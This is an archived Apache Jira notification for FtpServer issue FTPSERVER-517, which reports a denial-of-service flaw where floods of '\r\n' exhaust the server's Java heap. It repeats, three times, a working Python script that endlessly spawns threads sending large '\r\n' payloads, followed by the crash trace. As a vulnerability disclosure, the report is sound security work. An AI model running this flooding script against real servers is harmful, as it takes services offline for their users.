You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@mina.apache.org by "Ardu (Jira)" <ji...@apache.org> on 2022/12/10 12:28:00 UTC
[jira] [Updated] (FTPSERVER-517) The memory of FtpServer can be easily filled up, causing Dos threaten
[ https://issues.apache.org/jira/browse/FTPSERVER-517?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Ardu updated FTPSERVER-517:
---------------------------
Description:
Hi, I found the memory of FtpServer can be easily filled up with a lot of "\r\n" sequences. It shows that sending a long sequence with a lot of "\r\n" to the server can easily make the server's java heap space out of memory and make the server unavailable. It seems there is an issue in the memory control and command process. This may be a threat and exploited by attackers to do the Dos attack.
A similar threat can refer to CVE-2017-7651[https://bugs.eclipse.org/bugs/show_bug.cgi?id=529754]
Note that simply send the server a long senquence with casual characters except "\r\n" can not cause the same worse condition.
h2. Attack simulation
h3. run server
{code:java}
bin/ftpd.sh{code}
h3. run attack script
the attack script (in python) may seem like
{code:java}
import socket
import threading
import time
ip_address = "0.0.0.0"
port = 12345
payload = b"\r\n"*1000000 # work
#payload = b"aa"*1000000 # not work
def send_attack():
soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
soc.connect((ip_address,port))
soc.sendall(payload)
soc.close()
while(True):
for i in range(50):
t = threading.Thread(target=send_attack)
t.setDaemon(True)
t.start()
time.sleep(1) {code}
h2. Result
the server becomes unavailable and output information
{code:java}
Exception in thread "pool-1-thread-39" java.lang.OutOfMemoryError: Java heap space
at java.nio.HeapByteBuffer.<init>(HeapByteBuffer.java:57)
at java.nio.ByteBuffer.allocate(ByteBuffer.java:335)
at org.apache.mina.core.buffer.SimpleBufferAllocator.allocateNioBuffer(SimpleBufferAllocator.java:42)
at org.apache.mina.core.buffer.SimpleBufferAllocator.allocate(SimpleBufferAllocator.java:34)
at org.apache.mina.core.buffer.IoBuffer.allocate(IoBuffer.java:235)
at org.apache.mina.core.buffer.IoBuffer.allocate(IoBuffer.java:218)
at org.apache.mina.core.polling.AbstractPollingIoProcessor.read(AbstractPollingIoProcessor.java:508)
at org.apache.mina.core.polling.AbstractPollingIoProcessor.access$1200(AbstractPollingIoProcessor.java:68)
at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.process(AbstractPollingIoProcessor.java:1224)
at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.process(AbstractPollingIoProcessor.java:1213)
at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.run(AbstractPollingIoProcessor.java:683)
at org.apache.mina.util.NamePreservingRunnable.run(NamePreservingRunnable.java:64)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at java.lang.Thread.run(Thread.java:750)
{code}
was:
Hi, I found the memory of FtpServer can be easily filled up with a lot of "\r\n" sequences. It shows that sending a long sequence with a lot of "\r\n" to the server can easily make the server's java heap space out of memory and make the server unavailable. It seems there is an issue in the memory control and command process. This may be a threat and exploited by attackers to do the Dos attack.
A similar threat can refer to CVE-2017-7651[https://bugs.eclipse.org/bugs/show_bug.cgi?id=529754]
h2. Attack simulation
h3. run server
{code:java}
bin/ftpd.sh{code}
h3. run attack script
the attack script (in python) may seem like
{code:java}
import socket
import threading
import time
ip_address = "0.0.0.0"
port = 12345
payload = b"\r\n"*1000000 # work
#payload = b"aa"*1000000 # not work
def send_attack():
soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
soc.connect((ip_address,port))
soc.sendall(payload)
soc.close()
while(True):
for i in range(50):
t = threading.Thread(target=send_attack)
t.setDaemon(True)
t.start()
time.sleep(1) {code}
h2. Result
the server becomes unavailable and output information
{code:java}
Exception in thread "pool-1-thread-39" java.lang.OutOfMemoryError: Java heap space
at java.nio.HeapByteBuffer.<init>(HeapByteBuffer.java:57)
at java.nio.ByteBuffer.allocate(ByteBuffer.java:335)
at org.apache.mina.core.buffer.SimpleBufferAllocator.allocateNioBuffer(SimpleBufferAllocator.java:42)
at org.apache.mina.core.buffer.SimpleBufferAllocator.allocate(SimpleBufferAllocator.java:34)
at org.apache.mina.core.buffer.IoBuffer.allocate(IoBuffer.java:235)
at org.apache.mina.core.buffer.IoBuffer.allocate(IoBuffer.java:218)
at org.apache.mina.core.polling.AbstractPollingIoProcessor.read(AbstractPollingIoProcessor.java:508)
at org.apache.mina.core.polling.AbstractPollingIoProcessor.access$1200(AbstractPollingIoProcessor.java:68)
at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.process(AbstractPollingIoProcessor.java:1224)
at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.process(AbstractPollingIoProcessor.java:1213)
at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.run(AbstractPollingIoProcessor.java:683)
at org.apache.mina.util.NamePreservingRunnable.run(NamePreservingRunnable.java:64)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at java.lang.Thread.run(Thread.java:750)
{code}
> The memory of FtpServer can be easily filled up, causing Dos threaten
> ---------------------------------------------------------------------
>
> Key: FTPSERVER-517
> URL: https://issues.apache.org/jira/browse/FTPSERVER-517
> Project: FtpServer
> Issue Type: Bug
> Components: Core, Server
> Affects Versions: 1.2.0
> Environment: docker Ubuntu 20.04.3 LTS
> FtpServer version 1.2.0
> java version "1.8.0_341"
> Java(TM) SE Runtime Environment (build 1.8.0_341-b10)
> Java HotSpot(TM) 64-Bit Server VM (build 25.341-b10, mixed mode)
> Reporter: Ardu
> Priority: Major
> Attachments: apacheftp_atk.py
>
>
> Hi, I found the memory of FtpServer can be easily filled up with a lot of "\r\n" sequences. It shows that sending a long sequence with a lot of "\r\n" to the server can easily make the server's java heap space out of memory and make the server unavailable. It seems there is an issue in the memory control and command process. This may be a threat and exploited by attackers to do the Dos attack.
>
> A similar threat can refer to CVE-2017-7651[https://bugs.eclipse.org/bugs/show_bug.cgi?id=529754]
> Note that simply send the server a long senquence with casual characters except "\r\n" can not cause the same worse condition.
> h2. Attack simulation
> h3. run server
>
> {code:java}
> bin/ftpd.sh{code}
>
> h3. run attack script
> the attack script (in python) may seem like
> {code:java}
> import socket
> import threading
> import time
> ip_address = "0.0.0.0"
> port = 12345
> payload = b"\r\n"*1000000 # work
> #payload = b"aa"*1000000 # not work
> def send_attack():
> soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
> soc.connect((ip_address,port))
> soc.sendall(payload)
> soc.close()
> while(True):
> for i in range(50):
> t = threading.Thread(target=send_attack)
> t.setDaemon(True)
> t.start()
> time.sleep(1) {code}
> h2. Result
> the server becomes unavailable and output information
> {code:java}
> Exception in thread "pool-1-thread-39" java.lang.OutOfMemoryError: Java heap space
> at java.nio.HeapByteBuffer.<init>(HeapByteBuffer.java:57)
> at java.nio.ByteBuffer.allocate(ByteBuffer.java:335)
> at org.apache.mina.core.buffer.SimpleBufferAllocator.allocateNioBuffer(SimpleBufferAllocator.java:42)
> at org.apache.mina.core.buffer.SimpleBufferAllocator.allocate(SimpleBufferAllocator.java:34)
> at org.apache.mina.core.buffer.IoBuffer.allocate(IoBuffer.java:235)
> at org.apache.mina.core.buffer.IoBuffer.allocate(IoBuffer.java:218)
> at org.apache.mina.core.polling.AbstractPollingIoProcessor.read(AbstractPollingIoProcessor.java:508)
> at org.apache.mina.core.polling.AbstractPollingIoProcessor.access$1200(AbstractPollingIoProcessor.java:68)
> at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.process(AbstractPollingIoProcessor.java:1224)
> at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.process(AbstractPollingIoProcessor.java:1213)
> at org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.run(AbstractPollingIoProcessor.java:683)
> at org.apache.mina.util.NamePreservingRunnable.run(NamePreservingRunnable.java:64)
> at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
> at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
> at java.lang.Thread.run(Thread.java:750)
> {code}
>
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@mina.apache.org
For additional commands, e-mail: dev-help@mina.apache.org